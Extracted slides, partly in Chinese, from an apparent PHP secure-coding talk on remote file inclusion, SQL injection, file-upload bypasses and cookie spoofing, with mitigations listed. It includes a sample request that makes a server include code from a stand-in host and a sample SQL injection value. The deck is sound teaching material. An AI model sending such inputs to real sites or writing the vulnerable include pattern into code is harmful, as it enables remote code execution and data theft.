php safe-code
TRANSCRIPT
2security
Register Globals: Example
<?php include "$path/script.php"; ?> 提交一个这样的请求
?path=http%3A%2F%2Fbadboy.remote.com
include 'http://badboy.remote.com/script.php';
这样就产生一个远程包含漏洞
3security
XSS: Example
4security
SQL Injection: Example
5security
数字类型输入
数字大于 2147483647会出现溢出出现负数
6security
查询内容由外部输入
?field=version() from injection_login where 1 #
7security
SQL Injection: Solution
• 过滤输入数据• 单引输入数据 • 转义输入数据, mysql_real_escape_string()
8security
葵花宝典
PHP ScriptFilter Escape
Cookie
Forms
Referer, etc.
xhtml
MYSQL
9security
文件写入点上传文件
写日志文件
10security
文件上传
1. 验证文件类型
2. 验证文件后缀名
11security
文件上传
1.00 截断
2. 畸形文件名
12security
文件上传
13security
文件写入点
写日志文件1.防被下载
2.防被执行
14security
COOKIE 欺诈
15security
Q&A
16security
Reference
•高级PHP应用程序漏洞审核技术